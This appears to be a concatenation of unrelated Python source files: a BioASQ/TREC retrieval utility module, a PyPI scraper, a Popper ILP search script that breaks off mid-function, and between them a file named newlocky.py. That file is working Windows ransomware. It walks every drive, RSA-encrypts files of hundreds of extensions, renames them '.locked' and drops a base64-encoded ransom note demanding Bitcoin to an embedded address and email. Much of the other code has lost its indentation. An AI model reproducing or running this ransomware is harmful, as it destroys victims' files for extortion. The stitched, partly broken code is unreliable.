from os.path import join
import tempfile
import shutil
import pickle
import gc
import json
import tarfile
import codecs
import sys
from mmnrm.evaluation import f_map, f_recall
from datetime import datetime as dt
from nir.utils import change_bm25_parameters
import copy
from trectools import fusion, TrecRun
from collections import defaultdict
def fusion_rrf(run_paths, output_path):
runs = [ TrecRun(path) for path in run_paths]
fused_run = fusion.reciprocal_rank_fusion(runs)
fused_run.print_subset(output_path, topics=fused_run.topics())
def load_trec_run(file, queries):
final_run = copy.deepcopy(queries)
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
})
for q in final_run:
q["documents"] = run[q["id"]]
return final_run
def load_trec_run_snippets(file, queries):
final_run = copy.deepcopy(queries)
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
})
for q in final_run:
q["snippets"] = run[q["id"]]
return final_run
def convert_trec_run_to_bioasq(trec_path, queries, bioasq_path):
run = load_trec_run(trec_path, queries)
write_as_bioasq(run, bioasq_path)
def convert_trec_run_to_bioasq_wSnippets(trec_path, trec_path_snippets, cached_snipepts, queries, bioasq_path):
doc_run = load_trec_run(trec_path, queries)
snippet_run = load_trec_run_snippets(trec_path_snippets, queries)
snippet_run = {q["id"]:q for q in snippet_run}
for q in doc_run:
q["snippets"] = [ cached_snipepts[s["id"]] for s in snippet_run[q["id"]]["snippets"] ]
write_as_bioasq(doc_run, bioasq_path)
def write_as_bioasq(run, file, max_docs=10, max_snippets=10):
final_run = copy.deepcopy(run)
for query in final_run:
if "query" in query:
query["body"] = query.pop("query")
if "documents" in query:
query["documents"] = list(map(lambda x:"http://www.ncbi.nlm.nih.gov/pubmed/"+x["id"], query["documents"]))[:max_docs]
else:
query["documents"] = []
if "snippets" not in query:
query["snippets"] = []
else:
snippets = []
for snippet in query["snippets"][:max_snippets]:
section = "title" if snippet["is_title"] else "abstract"
snippets.append({
"beginSection": section,
"endSection": section,
"text": snippet["text"],
"document": "http://www.ncbi.nlm.nih.gov/pubmed/"+snippet["doc_id"],
"offsetInBeginSection": snippet["start"],
"offsetInEndSection": snippet["end"]
})
query["snippets"] = snippets
with open(file, "w", encoding="utf-8") as f:
json.dump({"questions":final_run}, f)
def evaluation(run, gs, top_n):
predictions = []
expectations = []
for query in run:
if query["id"] in gs:
predictions.append(list(map(lambda x:x["id"], query["documents"])))
expectations.append(gs[query["id"]]) #gs
return f_map(predictions, expectations, bioASQ_version=8, at=top_n),f_recall(predictions, expectations, at=top_n)
def separate_queries_goldstandard(queires, additional_keys=[]):
clean_queires = []
gs = {}
additional_keys = ["id", "query"] + additional_keys
for x in queires:
clean_queires.append({k:x[k] for k in additional_keys})
gs[x["id"]] = list(map(lambda y : y.split("/")[-1], x["documents"]))
return clean_queires, gs
def create_document_run(queries, run, snippets = None):
final_run = copy.deepcopy(queries)
for query in final_run:
query["documents"] = run[query["id"]]
if snippets is not None:
query["snippets"] = snippets[query["id"]]
return final_run
def save_document_run(run, file):
with open(file, "w") as f:
json.dump(run,f)
def load_document_run(file, dict_format=False):
with open(file, "r") as f:
run = json.load(f)
if isinstance(run,list) and dict_format:
_temp = {}
for q in run:
_temp[q["id"]] = q["documents"]
run = _temp
return run
def write_as_trec_snippets(run, file):
with open(file, "w") as f:
for query in run:
for rank,s in enumerate(query["snippets"]):
f.write("{} Q0 {} {} {} {}\n".format(query["id"],
s["snippet_id"],
rank,
s["score"],
"bioasq_as_trec"))
def write_as_trec(run, file):
with open(file, "w") as f:
for query in run:
for rank,doc in enumerate(query["documents"]):
f.write("{} Q0 {} {} {} {}\n".format(query["id"],
doc["id"],
rank,
doc["score"],
"bioasq_as_trec"))
def load_document_trec_run(file, *runs):
full_run = {}
runs = runs[0]
for q in load_document_run(runs[0]):
_temp = {}
for doc in q["documents"]:
_temp[doc["id"]] = doc
full_run[q["id"]] = _temp
for r in runs[1:]:
for q in load_document_run(r):
for doc in q["documents"]:
if doc["id"] not in full_run[q["id"]]:
full_run[q["id"]][doc["id"]] = doc
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
"text":full_run[line[0]][line[2]]["text"],
"title":full_run[line[0]][line[2]]["title"]
})
return run
def load_bioasq_format(file, maps=None):
"""
    Load a BioASQ-format file and optionally apply a list of (old_key, new_key) mappings
"""
with open(file, "r", encoding="utf-8") as f:
data = json.load(f)["questions"]
if maps:
for query in data:
for old_key,new_key in maps:
query[new_key] = query.pop(old_key)
return data
"""
Alias of load_bioasq_format, kept for backward compatibility.
"""
load_queries = load_bioasq_format
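# Illustrative sketch: a minimal round trip showing the maps argument, which
# renames BioASQ's "body" field to the "query" key used throughout this
# module.  The question text is made up.
def _demo_load_bioasq_format():
    data = {"questions": [{"id": "q1", "body": "what is BM25?"}]}
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as f:
        json.dump(data, f)
    queries = load_bioasq_format(f.name, maps=[("body", "query")])
    os.unlink(f.name)
    assert queries[0]["query"] == "what is BM25?"
    return queries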
def subset_byId(data, set_ids):
return [ x for x in data if x["id"] in set_ids]
def dir_tree_run(action, base_dir):
"""
    Apply function "action" to each file in the directory tree rooted at base_dir
"""
_temp_f_name = ""
for f_name in os.listdir(base_dir):
_temp_f_name = os.path.join(base_dir,f_name)
if os.path.isdir(_temp_f_name):
dir_tree_run(action,_temp_f_name)
else:
action(_temp_f_name)
def process_open_xml(proc_id, xml_files, output_dir):
    import pubmed_parser as pp
    from lxml import etree  # needed for the XMLSyntaxError handler below
def filter_mesh(string):
return " ".join(map(lambda y:y[0], map(lambda x: x.split(";"), string.split(":")[1:])))
print("[Process-{}] Started".format(proc_id))
articles = []
for file_name in xml_files:
print(proc_id, file_name)
try:
articles.extend(pp.parse_medline_xml(file_name, year_info_only=False, nlm_category=False))
except etree.XMLSyntaxError:
print("Error on File " + file_name)
gc.collect()
articles_filter = filter(lambda x: (x["abstract"] is not None and len(x["abstract"])>0 and x["pubdate"] != ""), articles)
articles_mapped = list(map(lambda x:{"id":x["pmid"],
"title":x["title"],
"abstract":x["abstract"],
"keywords":x["keywords"],
"pubdate":x["pubdate"],
"mesh_terms":filter_mesh(x["mesh_terms"]),
"delete":x["delete"]}
,articles_filter))
file_name = output_dir+"/pubmed_2019_{0:03}.p".format(proc_id)
print("[Process-{}]: Store {}".format(proc_id, file_name))
with open(file_name, "wb") as f:
pickle.dump(articles_mapped, f)
del articles
print("[Process-{}] Ended".format(proc_id))
def multiprocess_xml_to_json(xml_files, n_process, max_store_size=int(3e6), store_path="/backup/pubmed_archive_json/"):
from multiprocessing import Process
total_files = len(xml_files)
itter = total_files//n_process
tmp_path = tempfile.mkdtemp()
process = []
try:
for _i,i in enumerate(range(0, total_files, itter)):
process.append(Process(target=process_open_xml, args=(_i, xml_files[i:i+itter], tmp_path)))
print("[MULTIPROCESS LOOP] Starting", n_process, "process")
for p in process:
p.start()
print("[MULTIPROCESS LOOP] Wait", n_process, "process")
for p in process:
p.join()
del process
gc.collect()
## merge
resulting_files = sorted(os.listdir(tmp_path))
articles = []
for file in resulting_files:
with open(os.path.join(tmp_path, file), "rb") as f:
articles.extend(pickle.load(f))
# batch save
size = len(articles)
print(size)
itter = max_store_size
for i in range(0, size, itter):
file_name = store_path+"/pubmedMedline_2019_{0:08}_to_{1:08}".format(i, min(size, i+itter))
print("Save file",file_name,":",end="")
json.dump(articles[i:i+itter], open(file_name,"w"))
print("Done")
except Exception as e:
raise e
finally:
shutil.rmtree(tmp_path)
def multiprocess_xml_read(xml_files, n_process, max_store_size=int(3e6), store_path="/backup/pubmed_archive_json/", open_fn=process_open_xml):
from multiprocessing import Process
total_files = len(xml_files)
itter = total_files//n_process
tmp_path = tempfile.mkdtemp()
process = []
try:
for _i,i in enumerate(range(0, total_files, itter)):
process.append(Process(target=open_fn, args=(_i, xml_files[i:i+itter], tmp_path)))
print("[MULTIPROCESS LOOP] Starting", n_process, "process")
for p in process:
p.start()
print("[MULTIPROCESS LOOP] Wait", n_process, "process")
for p in process:
p.join()
del process
gc.collect()
## merge
resulting_files = sorted(os.listdir(tmp_path))
articles = []
for file in resulting_files:
with open(os.path.join(tmp_path, file), "rb") as f:
articles.extend(pickle.load(f))
except Exception as e:
raise e
finally:
shutil.rmtree(tmp_path)
return articles
def collection_iterator(file_name, f_map=None):
return collection_iterator_fn(file_name=file_name, f_map=f_map)()
def collection_iterator_fn(file_name, f_map=None):
reader = codecs.getreader("ascii")
tar = tarfile.open(file_name)
print("[CORPORA] Openning tar file", file_name)
members = tar.getmembers()
def generator():
for m in members:
print("[CORPORA] Openning tar file {}".format(m.name))
f = tar.extractfile(m)
articles = json.load(reader(f))
if f_map is not None:
articles = list(map(f_map, articles))
yield articles
f.close()
del f
gc.collect()
return generator
def create_filter_query_function():
    if sys.version_info < (3,):
        import string
        maketrans = string.maketrans
else:
maketrans = str.maketrans
filters = '+-=&|><!(){}[]^"~*?:\/'
tab = maketrans(filters, " "*(len(filters)))
def f(query_string):
return query_string.translate(tab)
return f
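# Illustrative sketch: the filter above blanks out Lucene/Elasticsearch
# query_string special characters so raw question text cannot break the query
# syntax.
def _demo_filter_query():
    f = create_filter_query_function()
    return f('what is "BM25" (ranking)?')
    # quotes, parentheses and '?' are replaced by spaces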
def to_date(_str):
for fmt in ("%Y-%m", "%Y-%m-%d", "%Y"):
try:
return dt.strptime(_str, fmt)
except ValueError:
pass
raise ValueError("No format found")
def execute_search(es, queries, top_n, index_name, k1=0.4, b=0.4, limit_date = None):
print("Setting the k1 and b for BM25")
change_bm25_parameters(k1, b, index_name, es)
query_filter = create_filter_query_function()
predictions = []
if limit_date is None:
print("The inquery limit_date will be used")
for i, query_data in enumerate(queries):
#query = query_data["query"]
#query = query_filter(query_data["body"])
query = query_data["query"]
if "limit_date" in query_data:
limit_date = query_data["limit_date"]
elif limit_date is None:
raise ValueError("Need to set or provide a limit_date")
query_es = {
"query": {
"bool": {
"must": [
{
"query_string": {
"query": query_filter(query),
"analyzer": "english",
"fields": [ "text" ]
}
},
{
"range": {
"pubdate": {
"lte": limit_date
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
retrieved = es.search(index=index_name, body=query_es, size=top_n, request_timeout=200)
clean_results = list(map(lambda x: {"id":x['_source']["id"], "text":x['_source']["text"],"title":x['_source']["title"], "score":x["_score"]}, retrieved['hits']['hits']))
predictions.append((query_data["id"], clean_results))
if not i%20:
print("Running query:", i, end="\r")
return dict(predictions)
|
newlocky.py
|
from base64 import b64encode
from base64 import b64decode
from threading import Thread
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
from Crypto.PublicKey import RSA
from ctypes import windll
from os import walk
from os import rename
from os import path
from os import urandom
def npass(length):
if not isinstance(length, int) or length < 8:
raise ValueError("temp password must have positive length")
chars = "abcdefghijklmnopqrstvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"
x = urandom(length)
x = x.decode('latin1')
return "".join(chars[ord(c) % len(chars)] for c in x)
uid = npass(16) + "a3"
address = '31k66UgDfv6DVdi4HubFpbwXkh6vN44CEF'
rsa_public_key = '''-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm6HVnUVQdGlC8RoOX0qG
3F2KwfL1RuEcWYlsqPcxyY+APHykuk636l/md2S9Qg1+GUlopJmB2V977M/bS+8K
jm2gR3p7gLVEDnqDoMwSwmUDhKo7sNTDF62U9zYnSIIb/Z3p/SWMI9NEOgVGTyPX
en3yhAT/qKH070njVzJclVaA7FU6Q/7Z5L5z0Zm1o+SBrqYXgFi1w8fo5TiKMAK5
gpRujBey7MpSEcIXOC4o6NZ0zajMF+ZWyIYgo3YMbEb/VJdAUgcCPUrIysMqnb2P
51D7XbXvJw716hJIiQGdxrsM2rXpb8Y44/smsExveyv6e8mj0Fcrg8cMjeqN5dRf
OwIDAQAB
-----END PUBLIC KEY-----'''
email = 'snipersr@india.com'
msg ="77u/RU5HTElTSDoNCiNXaGF0IGhhcHBlbmVkPw0KQUxMIHlvdXIgaW1wb3J0YW50IGZpbGVzKGRhdGFiYXNlLGRvY3VtZW50cyxpbWFnZXMsdmlkZW9zLG11c2ljLGV0Yy4paGF2ZSBiZWVuIGVuY3J5cHRlZCENCkFuZCBvbmx5IHdlIGNhbiBkZWNyeXB0IQ0KVG8gZGVjcnlwdCB5b3VyIGZpbGVzLHlvdSBuZWVkIHRvIGJ1eSB0aGUgZGVjcnlwdGlvbiBrZXkgZnJvbSB1cy4NCldlIGFyZSB0aGUgb25seSBvbmUgd2hvIGNhbiBkZWNyeXB0IHRoZSBmaWxlIGZvciB5b3UuDQoNCiNBdHRlbnRpb24hDQpUcnlpbmcgdG8gcmVpbnN0YWxsIHRoZSBzeXN0ZW0gYW5kIGRlY3J5cHRpbmcgdGhlIGZpbGUgd2l0aCBhIHRoaXJkLXBhcnR5IHRvb2wgd2lsbCByZXN1bHQNCmluIGZpbGUgY29ycnVwdGlvbix3aGljaCBtZWFucyBubyBvbmUgY2FuIGRlY3J5cHQgeW91ciBmaWxlLihpbmNsdWRpbmcgdXMpLA0KaWYgeW91IHN0aWxsIHRyeSB0byBkZWNyeXB0IHRoZSBmaWxlIHlvdXJzZWxmLHlvdSBkbyBzbyBhdCB5b3VyIG93biByaXNrIQ0KDQojVGVzdCBkZWNyeXB0aW9uIQ0KQXMgYSBwcm9vZix5b3UgY2FuIGVtYWlsIHVzIDMgZmlsZXMgdG8gZGVjcnlwdCwNCmFuZCB3ZSBzdGlsbCBzZW5kIHlvdSB0aGUgcmVjb3ZlcmVkIGZpbGVzIHRvIHByb3ZlIHRoYXQgd2UgY2FuIGRlY3J5cHQgeW91ciBmaWxlcy4NCg0KI0hvdyB0byBkZWNyeXB0Pw0KMS5CdXkgKDAuMikgQml0Y29pbi4NCjIuU2VuZCAoMC4yKSBCaXRjb2luIHRvIHRoZSBwYXltZW50IGFkZHJlc3MuDQozLkVtYWlsIHlvdXIgSUQgdG8gdXMsYWZ0ZXIgdmVyaWZpY2F0aW9uLHdlIHdpbGwgY3JlYXRlIGEgZGVjcnlwdGlvbiB0b29sIGZvciB5b3UuDQoNClJlbWVtYmVyLGJhZCB0aGluZ3MgaGF2ZSBoYXBwZW5lZCxub3cgbG9vayBhdCB5b3VyIGRldGVybWluYXRpb24gYW5kIGFjdGlvbiENCg0KWW91ciBJRDojdWlkDQpFLW1haWw6I2VtYWlsDQpQYXltZW50OiNhZGRyZXNzDQoNCg0K5Lit5paH77yaDQoj5Y+R55Sf5LqG5LuA5LmIPw0K5oKo5omA5pyJ55qE6YeN6KaB5paH5Lu277yI5pWw5o2u5bqT44CB5paH5qGj44CB5Zu+5YOP44CB6KeG6aKR44CB6Z+z5LmQ562J77yJ5bey6KKr5Yqg5a+G77yB5bm25LiU5Y+q5pyJ5oiR5Lus5omN6IO96Kej5a+G77yBDQoNCiPms6jmhI/kuovpobnvvIENCuWwneivlemHjeaWsOWuieijheezu+e7n+W5tuS9v+eUqOesrOS4ieaWueW3peWFt+ino+WvhuaWh+S7tuWwhuWvvOiHtOaWh+S7tuaNn+Wdj++8jOi/meaEj+WRs+edgOayoeacieS6uuWPr+S7peino+WvhuaCqOeahOaWh+S7tg0K77yI5YyF5ous5oiR5Lus77yJ77yM5aaC5p6c5oKo5LuN5bCd6K+V6Ieq6KGM6Kej5a+G5paH5Lu277yM5YiZ6ZyA6Ieq6KGM5om/5ouF6aOO6Zmp77yBDQoNCiPmtYvor5Xop6Plr4bvvIENCuS9nOS4uuivgeaYju+8jOaCqOWPr+S7pemAmui/h+eUteWtkOmCruS7tuWQkeaIkeS7rOWPkemAgTPkuKropoHop6Plr4bnmoTmlofku7bvvIzmiJHku6zkvJrlsIbmgaLlpI3lkI7nmoTmlofku7blj5HpgIHnu5nmgqjvvIwNCuS7peivgeaYjuaIkeS7rOWPr+S7peino+WvhuaCqOeahOaWh+S7tuOAgg0KDQoj5aaC5L2V6Kej5a+GDQoxLui0reS5sCAoMC4yKSDkuKrmr5TnibnluIENCjIu5bCGICgwLjIpIOS4qiDmr5TnibnluIHlj5HpgIHliLDku5jmrL7lnLDlnYANCjMu5bCG5oKo55qESUTpgJrov4fnlLXlrZDpgq7ku7blj5HpgIHnu5nmiJHku6zvvIznu4/moLjlrp7lkI7vvIzmiJHku6zlsIbkuLrmgqjliLbkvZzop6Plr4blt6XlhbcNCg0K6K+36K6w5L2P77yM5pyA5Z2P55qE5LqL5oOF5bey57uP5Y+R55Sf5LqG77yM546w5Zyo5bCx55yL5oKo55qE5Yaz5b+D5ZKM6KGM5Yqo5LqG77yBDQoNCuaCqOeahElE77yaI3VpZA0K6YKu566x5Zyw5Z2A77yaI2VtYWlsDQrku5jmrL7lnLDlnYDvvJojYWRkcmVzcw0K"
msg = b64decode(msg)
msg = msg.decode('utf-8')
msg = msg.replace("#email",email)
msg = msg.replace("#uid",uid)
msg = msg.replace('#address',address)
msg = msg.encode('utf-8')
def get_drives():
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
letter = ord('A')
while bitmask > 0:
if bitmask & 1:
drives.append(chr(letter) + ':\\')
bitmask >>= 1
letter += 1
return drives
edisk = get_drives()
def rsa_long_encrypt(rsa_public_key, plantext):
length = len(plantext)
default_length = 245
pubobj = Cipher_pkcs1_v1_5.new(RSA.importKey(rsa_public_key))
if length < default_length:
return b64encode(pubobj.encrypt(plantext))
offset = 0
res = []
while length - offset > 0:
if length - offset > default_length:
res.append(pubobj.encrypt(plantext[offset:offset + default_length]))
else:
res.append(pubobj.encrypt(plantext[offset:]))
offset += default_length
byte_data = b''.join(res)
return b64encode(byte_data)
def efile(fname,msg,rsa_public_key):
fi, ext = path.splitext(fname)
ext = ext[1:]
ENCRYPTABLE_FILETYPES = [
# GENERAL FORMATS
"dat", "keychain", "sdf", "vcf","NDF","ndf","",
# IMAGE FORMATS
"jpg", "png", "tiff", "tif", "gif", "jpeg", "jif", "jfif", "jp2", "jpx", "j2k", "j2c", "fpx", "pcd", "bmp",
"svg",
"3dm", "3ds", "max", "obj", "dds", "psd", "tga", "thm", "tif", "tiff", "yuv", "ai", "eps", "ps", "svg", "indd",
"pct","pem","ldf","LDF","key","KEY","exe","dll","DLL",
# VIDEO FORMATS
"mp4", "avi", "mkv", "3g2", "3gp", "asf", "flv", "m4v", "mov", "mpg", "rm", "srt", "swf", "vob", "wmv",
"vep","pbb","zhc","zhl",
# DOCUMENT FORMATS
"doc","DOC", "docx","DOCX", "txt","TXT", "pdf","PDF", "log","LOG", "msg", "odt", "pages", "rtf", "tex", "wpd", "wps", "csv", "ged", "key",
"pps",
"ppt", "pptx", "xml", "json", "xlsx","XLSX", "xlsm", "xlsb","XLSB" ,"xls","XLS", "mht", "mhtml" ,"htm", "html","Html", "xltx", "prn",
"dif",
"slk", "xlam", "xla", "ods", "docm", "dotx", "dotm", "xps", "ics","md","part","chm","text","TEXT","config","CONFIG",
# SOUND FORMATS
"mp3", "aif", "iff", "m3u", "m4a", "mid", "mpa", "wav", "wma","jks","xsd","properties","policy","dwg","dwg",
"dwt","DWT","dws","DWS","dxf","fla","FLA","hpp","HPP","LRG",
# EXE AND PROGRAM FORMATS
"msi", "php", "apk", "app", "bat","BAT", "cgi", "com", "asp", "aspx", "cer", "cfm", "css", "htm", "Htm",
"js", "jsp", "rss", "xhtml", "c", "class", "cpp", "cs", "h", "pyc" , "py" , "java", "lua", "pl", "sh", "sln",
"swift" , "vb","VB","vcxproj","BAK","mf","MF","jar","com","net","NET","cmd","CMD",".bashrc","cnf","skp","myd","frm","MYI",
# GAME FILES
"dem", "gam", "nes", "rom", "sav","x3d","spi","ack","pak","lnk","md5","ins","war","reg","cab",
# COMPRESSION FORMATS
"tgz", "zip", "rar", "tar", "7z", "cbr", "deb", "gz", "pkg", "rpm", "zipx", "iso","z","vsdx","TMP","Lst",
# MISC
"ged", "accdb", "db", "dbf", "mdb", "sql", "fnt", "fon", "otf", "ttf", "cfg", "ini", "prf", "bak", "old", "tmp",
"torrent" , "rbk" ,"rep" , "dbb","mdf","MDF","wdb"]
if ext not in ENCRYPTABLE_FILETYPES:
return 0
lookm = fname + ".locked"
if path.isfile(lookm):
return 0
if "HOW_TO_BACK_FILES.txt" in fname:
return 0
if "sqlserver.lnk" in fname:
return 0
try:
fd = open(fname, "rb")
plantext = fd.read()
fd.close()
fd = open(fname, "wb")
plantext = rsa_long_encrypt(rsa_public_key, plantext)
fd.write(plantext)
fd.close()
rename(fname,fname+'.locked')
except:
pass
def estart(drive, msg,rsa_public_key):
for p, d, f in walk(drive,topdown=True):
for ff in f:
fname = path.join(p, ff)
ttt = Thread(target=efile, args=(fname, msg, rsa_public_key))
ttt.start()
infof = path.join(p, "HOW_TO_BACK_FILES.txt")
try:
myf = open(infof, "wb")
myf.write(msg)
myf.close()
except:
pass
return 0
edisk = get_drives()
for drive in edisk:
t = Thread(target=estart, args=(drive,msg,rsa_public_key))
t.start()
|
scraper.py
|
# -*- coding: utf-8 -*-
import zmq
from lxml import etree
from zmq.eventloop import ioloop
import time
import os
import functools
import urllib2
from StringIO import StringIO
import re
import sqlite3
# PyPI page related constants
PYPI_BASE_URL = "http://pypi.python.org%s"
pkg_list_url = PYPI_BASE_URL % r"/pypi?%3Aaction=index"
PKG_PATH = "//td/a"
# ZeroMQ setting
VENTILATOR_TARGET = "ipc://pypiv.ipc"
SINK_TARGET = "ipc://pypis.ipc"
INTERVAL = 0.1
# SQLite setting
SQLITE_STORE = "pypi.db"
INSERT_TEMPLATE = ("""insert into pypi values """ +
                   """('%(name)s', '%(version)s', '%(url)s')""")
def init():
if os.path.exists(SQLITE_STORE):
os.remove(SQLITE_STORE)
conn = sqlite3.connect(SQLITE_STORE)
cur = conn.cursor()
cur.execute( ("""create table pypi (""" +
"""name text, version text, url text)""") )
conn.commit()
conn.close()
def ventilator():
context = zmq.Context()
ventilator = context.socket(zmq.PUSH)
ventilator.bind(VENTILATOR_TARGET)
fp = urllib2.urlopen(pkg_list_url)
data = fp.read()
tree = etree.parse(StringIO(data), etree.HTMLParser())
pkgs = tree.xpath(PKG_PATH)
time.sleep(1.0)
for p in pkgs:
url = PYPI_BASE_URL % p.attrib['href']
print url
ventilator.send(url)
def worker():
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.connect(VENTILATOR_TARGET)
sender = context.socket(zmq.PUSH)
sender.connect(SINK_TARGET)
callback = functools.partial(pkg_url_handler, sender)
loop = ioloop.IOLoop.instance()
loop.add_handler(receiver, callback, zmq.POLLIN)
loop.start()
def sink():
context = zmq.Context()
sink = context.socket(zmq.PULL)
sink.bind(SINK_TARGET)
conn = sqlite3.connect(SQLITE_STORE)
cur = conn.cursor()
def pull_handler(socket, events):
message = socket.recv_pyobj()
sql = INSERT_TEMPLATE % message
print sql
cur.execute(sql)
def timeout_handler():
conn.commit()
        conn.close()
loop = ioloop.IOLoop.instance()
loop.add_handler(sink, pull_handler, zmq.POLLIN)
    loop.add_timeout(time.time() + 5.0, timeout_handler)
loop.start()
def pkg_url_handler(sender, receiver, events):
pkg_url = receiver.recv()
p = urllib2.urlopen(pkg_url)
data = p.read()
pkginfo = parse_pkginfo(data)
sender.send_pyobj(pkginfo)
def __parse_helper(li):
strong = li.xpath('./strong')[0].text
span = li.xpath('./span')[0].text
    return strong.lower()[:-1], span
def parse_pkginfo(source):
tree = etree.parse(StringIO(source), etree.HTMLParser())
# hard coding
title_tag = tree.xpath("//title")[0].text.split()
    name = ' '.join(title_tag[:-1])
version = title_tag[-1]
additional_path = "/pypi/%s/%s" % (name, version)
url = PYPI_BASE_URL % additional_path
ul = tree.xpath("//div[@id='content']/div[@class='section']/ul[@class='nodot']/li")
    for li in ul:
        __parse_helper(li)  # per-field metadata parsing was never finished; values unused
    return dict(name=name, version=version, url=url)
def main():
from multiprocessing import cpu_count, Process, Pool
max_process = 2 * cpu_count()
sinkp = Process(target=sink)
print "*** SINK START ***"
sinkp.start()
for i in range(max_process):
workerp = Process(target=worker)
print "*** WORKER %d START ***" % i
workerp.start()
ventilatorp = Process(target=ventilator)
print "*** VENTILATOR START"
ventilatorp.start()
ventilatorp.join()
sinkp.join()
if __name__ == '__main__':
import argparse
description = "PyPI data scraper"
parser = argparse.ArgumentParser(description=description)
parser.add_argument('type', choices='vwsim')
class Prog:
"""dummy class for namespace"""
pass
def exec_error():
print "to see usage, type --help"
prog = Prog()
parser.parse_args(namespace=prog)
process_type = {
'v': ventilator,
'w': worker,
's': sink,
'i': init,
'm': main
}
process = process_type.get(prog.type, exec_error)
process()
|
split.py
|
#!/usr/bin/env python3
import random
from popper.utils import Settings, Stats
from popper.aspsolver import Clingo
from popper.tester import Tester
from popper.constrain import Constrain, Outcome, Con
from popper.generate import generate_program
from popper.core import Clause, Literal, Grounding, Program
from datetime import datetime
import multiprocessing
import os
MIN_SIZE=2
MAX_SIZE=100
DEBUG=False
def prog_to_code(prog):
return [Clause.to_code(clause) for clause in prog]
def tmp():
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
return current_time
def ground_rules(grounder, max_clauses, max_vars, rules):
for (head, body) in rules:
# find bindings for variables in the constraint
assignments = grounder.find_bindings(head, body, max_clauses, max_vars)
# keep only standard literals
body = [literal for literal in body if isinstance(literal, Literal)]
# ground the clause for each variable assignment
for assignment in assignments:
yield Grounding.ground_rule(head, body, assignment)
def dbg(*args):
if DEBUG:
print(tmp(),*args)
def build_constraints(settings, stats, constrainer, tester, program, pos, neg):
# 3. Build constraints
rules = set()
if settings.functional_test and tester.is_non_functional(program.clauses):
for x in constrainer.generalisation_constraint(program):
rules.add(x)
for rule in tester.check_redundant_literal(program.clauses):
for x in constrainer.redundant_literal_constraint(rule):
rules.add(x)
# eliminate generalisations of programs that contain redundant clauses
if tester.check_redundant_clause(program.clauses):
for x in constrainer.generalisation_constraint(program):
rules.add(x)
if len(program.clauses) > 1:
# pass
# evaluate inconsistent sub-clauses
with stats.duration('test_individual_rules.is_inconsistent'):
for rule in program.clauses:
if rule.is_recursive():
continue
if tester.is_inconsistent(rule, neg):
for x in constrainer.generalisation_constraint(Program([rule])):
rules.add(x)
# eliminate totally incomplete rules
with stats.duration('test_individual_rules.is_totally_incomplete'):
if not any(rule.is_recursive() for rule in program.clauses):
for rule in program.clauses:
if tester.is_totally_incomplete(rule, pos):
for x in constrainer.redundancy_constraint(Program([rule])):
rules.add(x)
return rules
def pprint(program):
for clause in program.to_code():
dbg('\t' + clause)
# @profile
def popper(settings, stats, constrainer, grounder, tester, pos, neg, inc_rules, gen_rules, spec_rules, redundancy_rules, min_size, max_size):
solver = Clingo(settings.bias_file, settings.clingo_args)
all_rules = set()
all_rules.update(inc_rules)
all_rules.update(gen_rules)
all_rules.update(spec_rules)
all_rules.update(redundancy_rules)
if settings.constraints:
# add constraints we have already discovered
with stats.duration('add_old_rules'):
solver.add_ground_clauses(all_rules)
new_inc_rules = set()
new_gen_rules = set()
new_spec_rules = set()
new_redundacy_rules = set()
for size in range(min_size, max_size+1):
# if settings.debug:
dbg(f'{"*" * 20} MAX LITERALS: {size} {"*" * 20}')
solver.update_number_of_literals(size)
while True:
with stats.duration('generate'):
model = solver.get_model()
if not model:
break
program = generate_program(model)
stats.total_programs += 1
# 2. Test
# THIS CODE IS VERY EXPENSIVE
with stats.duration('test'):
(outcome, conf_matrix) = tester.test(program.clauses, pos, neg)
# (outcome, conf_matrix) = tester.test_old(program.clauses, pos, neg, test_all=False)
if settings.debug:
(tp, fn, tn, fp) = conf_matrix
dbg(f'Program {stats.total_programs}:')
pprint(program)
approx_pos = '+' if tp + fn < len(pos) else ''
approx_neg = '+' if tn + fp < len(neg) else ''
dbg(f'tp: {tp}{approx_pos}, fn: {fn}{approx_pos}, tn: {tn}{approx_neg}, fp: {fp}{approx_neg}')
if outcome == (Outcome.ALL, Outcome.NONE):
return (program.clauses, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
with stats.duration('build_constraints'):
rules = build_constraints(settings, stats, constrainer, tester, program, pos, neg)
for rule in program.clauses:
rules.update(build_constraints(settings, stats, constrainer, tester, Program([rule], program.before), pos, neg))
# add other constraints
rules.update(constrainer.build_constraints(program, outcome))
# 4. Ground constraints
with stats.duration('ground'):
to_add = set()
for (rule_type, rule) in rules:
if settings.debug:
dbg('rule_type',rule_type)
Constrain.print_constraint(rule)
for ground_rule in set(ground_rules(grounder, solver.max_clauses, solver.max_vars, [rule])):
if ground_rule in all_rules:
continue
to_add.add(ground_rule)
if rule_type == 'INCLUSION':
# new_gen_rules.add(ground_rule)
# new_spec_rules.add(ground_rule)
# new_redundacy_rules.add(ground_rule)
new_inc_rules.add(ground_rule)
elif rule_type == Con.GENERALISATION:
new_gen_rules.add(ground_rule)
elif rule_type == Con.SPECIALISATION:
new_spec_rules.add(ground_rule)
elif rule_type == Con.REDUNDANCY:
new_redundacy_rules.add(ground_rule)
if outcome == (Outcome.ALL, Outcome.NONE):
return (program.clauses, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
# 5. Add to the solver
with stats.duration('add'):
solver.add_ground_clauses(to_add)
return (None, new_inc_rules, new_gen_rules, new_spec_rules, new_redundacy_rules)
def num_literals(program):
size = 0
for rule in program:
size = size + len(rule.body) + 1
return size
def mdl(program, conf_matrix):
(tp, fn, tn, fp) = conf_matrix
size = num_literals(program)
num_errors = fn + fp
return size + (num_errors * 10)
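# Illustrative sketch: mdl() trades program size against accuracy, where each
# literal costs 1 and each misclassified example (fn + fp) costs 10.  FakeRule
# is a stand-in for popper's Clause objects, used only to exercise the
# arithmetic.
def _demo_mdl():
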